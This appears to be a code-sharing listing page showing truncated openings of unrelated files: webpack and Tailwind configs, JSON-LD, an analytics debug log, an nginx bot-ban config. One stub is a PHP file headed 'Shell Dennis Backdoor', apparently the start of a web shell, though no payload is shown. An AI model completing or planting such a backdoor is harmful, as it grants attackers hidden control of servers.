This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// webpack.common.js - common webpack config | |
const LEGACY_CONFIG = 'legacy'; | |
const MODERN_CONFIG = 'modern'; | |
// node modules | |
const path = require('path'); | |
const merge = require('webpack-merge'); | |
// webpack plugins | |
const CopyWebpackPlugin = require('copy-webpack-plugin'); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// webpack.common.js - common webpack config | |
const LEGACY_CONFIG = 'legacy'; | |
const MODERN_CONFIG = 'modern'; | |
// node modules | |
const path = require('path'); | |
const merge = require('webpack-merge'); | |
// webpack plugins | |
const CopyWebpackPlugin = require('copy-webpack-plugin'); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// webpack.dev.js - developmental builds | |
const LEGACY_CONFIG = 'legacy'; | |
const MODERN_CONFIG = 'modern'; | |
// node modules | |
const merge = require('webpack-merge'); | |
const path = require('path'); | |
const webpack = require('webpack'); | |
// webpack plugins |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
** TailwindCSS Configuration File | |
** | |
** Docs: https://tailwindcss.com/docs/configuration | |
** Default: https://github.com/tailwindcss/tailwindcss/blob/master/stubs/defaultConfig.stub.js | |
*/ | |
// Cols Function | |
function cols(col, context, unit) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"@context": "http://schema.org", | |
"@graph": [ | |
{ | |
"@type": "AboutPage", | |
"author": { | |
"@id": "https://www.schaper-wels.at/#identity" | |
}, | |
"copyrightHolder": { | |
"@id": "https://www.schaper-wels.at/#identity" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Auf seiten wo es geht kommt im GA Debugger das: | |
analytics_debug.js:25 Initializing Google Analytics. | |
analytics_debug.js:25 Loading resource for plugin: ec | |
analytics_debug.js:25 Loading script: "https://www.google-analytics.com/plugins/ua/ec.js" | |
analytics_debug.js:25 Running command: ga("create", "UA-XXX-XXX", {name: "gtm1", cookieDomain: "auto"}) | |
analytics_debug.js:25 Running command: ga("gtm1.set", ">m", "XXX") | |
analytics_debug.js:25 Running command: ga("gtm1.set", {anonymizeIp: true}) | |
analytics_debug.js:25 Running command: ga("gtm1.set", "hitCallback", [function]) | |
analytics_debug.js:25 Running command: ga("gtm1.send", "pageview") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* ScrollMonitor | |
*/ | |
const scrollMonitorScript = { | |
cfg: { | |
selectors: { | |
waypoint: '[waypoint]', | |
waypointTarget: '[waypoint-target]', | |
}, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# FORGE CONFIG (DOT NOT REMOVE!) | |
include forge-conf/bestwebsite.gallery/before/*; | |
# Bots to ban via user agent | |
map $http_user_agent $limit_bots { | |
default 0; | |
~*(AhrefsBot|Baiduspider|PaperLiBot) 1; | |
} | |
server { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
//Shell Dennis Backdoor | |
//Redesign By Dennis | |
// | |
set_time_limit(0); | |
error_reporting(0); | |
if(get_magic_quotes_gpc()){ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
set_time_limit(0); | |
ini_set('display_errors', 0); | |
ini_set('display_startup_errors', 0); | |
error_reporting(E_ALL); | |
include('pdf.php'); | |
function query_str($params) { |